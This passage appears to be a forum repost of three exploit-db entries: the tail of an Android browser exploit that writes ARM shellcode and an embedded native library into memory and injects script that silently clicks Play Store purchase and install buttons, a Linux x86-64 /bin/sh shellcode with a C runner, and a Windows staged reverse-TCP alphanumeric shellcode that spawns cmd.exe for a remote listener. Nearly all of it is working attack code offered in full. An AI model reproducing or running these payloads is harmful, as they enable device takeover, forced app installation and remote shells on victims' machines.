x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,]; var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000"; var arrayBuffer = new ArrayBuffer(0x1000000); var arrayBufferAddress = getObjAddr(arrayBuffer)-1; var backingStoreAddress = read_uint32(arrayBufferAddress+4*4); var args_address = backingStoreAddress+1024; function write_shellcode(dlsym_addr,buffer){ //ldr r0,[pc,4]//0xe59f0004 //ldr r1,[pc,4]//0xe59f1004 //b shellcode;//0xea000001 //dlopen_addr//array_buffer_address //dlsym_addr //shellcode //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr]; var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000]; for(var i=0;i<stub.length;i++){ globaldv[buffer/4+i]=stub[i]; } shellcode = shellcode.concat([0,0,0,0]); for(var i=0;i<shellcode.length/4>>>0;i++){ // u8arr[i+4*stub.length]=shellcode[i]; globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]); } return stub.length*4+shellcode.length; } function xss_code(){ //alert(navigator.userAgent); //alert(document.cookie); var i1=setInterval(function(){ if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){ console.log("wait load complete"); return; } clearInterval(i1); var i2=setInterval(function(){ document.getElementsByClassName("price buy id-track-click")[0].click(); var installButton = document.getElementById("purchase-ok-button"); if(installButton == null) return; installButton.click(); document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>"); clearInterval(i2); setTimeout(function(){ window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end"); },26000); },500); },500); } var js_str="\n"+xss_code.toString()+"xss_code();\n"; //var backup_arr = backup_original_code(huge_func_code_entry); var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry); var args_view = new DataView(arrayBuffer,1024,100); var so_file_view = new DataView(arrayBuffer,4096); var js_view = new DataView(arrayBuffer,0x100000); args_view.setUint32(0,dlsym_addr+0xc,true); args_view.setUint32(4,dlsym_addr,true); args_view.setUint32(8,huge_func_code_entry,true); args_view.setUint32(12,writed_len,true); args_view.setUint32(16,backingStoreAddress+4096,true); args_view.setUint32(20,so_str.length/2,true); args_view.setUint32(24,backingStoreAddress+0x100000,true); args_view.setUint32(28,js_str.length,true); print("length is "+so_str.length); for(var i=0;i<so_str.length;i+=2){ var value = so_str.substr(i,2); value = "0x"+value; so_file_view.setUint8(i/2,parseInt(value)); } for(var i=0;i<js_str.length;i++){ js_view.setUint8(i,js_str.charCodeAt(i)); } print("begin execute shellcode"); huge_func({}); print("done"); postMessage(true); //prevent arrayBuffer to be released while(1){} } //main world function print(){ console.log.apply(null,arguments); document.write('<p >'); document.write.apply(document,arguments); document.write("<p>"); } // Build a worker from an anonymous function body var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) ); var worker; var exploitSucc = false; var count = 0; function startExploit(){ print("worker thread is started"); worker = new Worker( blobURL ); count++; worker.onmessage = function(e){ print("exploit result is "+e.data); exploitSucc = e.data; if(exploitSucc==false){ startExploit(); return; } var end = +new Date(); print("time diff is "+(end-begin)/1000); //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android'; top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner'; } } var begin = +new Date(); startExploit(); var savedCount = 0; var hangMonitor = setInterval(function (){ if(exploitSucc==true){ clearInterval(hangMonitor); }else{ if(savedCount==count){//maybe hang print("worker maybe hange"); worker.terminate(); startExploit(); }else{ print("worker is normal"); savedCount = count; } } },10000); //URL.revokeObjectURL( blobURL ); </script> </html> Sursa: https://www.exploit-db.com/exploits/42175/. Platform: Android.

/* ;Title: Linux/x86-64 - /bin/sh Shellcode ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86_64 ;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes. ;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04) ===COMPILATION AND EXECUTION=== #nasm -f elf64 shell.asm -o shell.o #ld shell.o -o shell <=== Making Binary File #./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell) =================SHELLCODE(INTEL FORMAT)================= section .text global _start _start: jmp shell here: xor rax,rax pop rdi xor rsi,rsi xor rdx,rdx add rax,59 syscall shell: call here bash db "/bin//sh" ===================END HERE============================ Compile with gcc with some options. # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"; main() { printf("Touhid Shaikh (http://www.touhidshaikh.com)\n"); printf("Shellcode Length : %d\n", (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); } Sursa: https://www.exploit-db.com/exploits/42126/.

########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ######## ########### Author: Snir Levi, Applitects ############# ## 332 Bytes ## ## For Educational Purposes Only ## Date: 01.03.17 Author: Snir Levi Email: snircontact@gmail.com https://github.com/snir-levi/ IP - 127.0.0.1 PORT - 4444 Tested on: Windows 7 Windows 10 ###Usage### Victim Executes the first stage shellcode, and opens tcp connection After Connection is established, send the Alphanumeric stage to the connection nc -lvp 4444 connect to [127.0.0.1] from localhost [127.0.0.1] (port) RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\> ########### ##Shellcode## #### Second Stage Alphanumeric shellcode: ##### RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS R push edx P push eax hoces push 0x7365636f //oces htePr push 0x72506574 //tePr hCrea push 0x61657243 //Crea T push esp Q push ecx PX will be replaced with call [esi] (0x16ff) L*8 dec esp // offset esp to kernel32.dll Address Y pop ecx // ecx = kernel32 F*4 inc esi -> offset [esi+4] PX will be replaced with mov [esi],eax (0x0689) N*4 dec esi -> offset [esi] j0 push 0x30 X pop eax H*48 dec eax // zeroing eax P push eax hessA push 0x41737365 //essA (will be null terminated) hProc push 0x636f7250 //Proc hExit push 0x74697845 //Exit T push esp Q push ecx PX will be replaced with call [esi] (0x16ff) F*8 inc esi -> offset [esi+8] PX 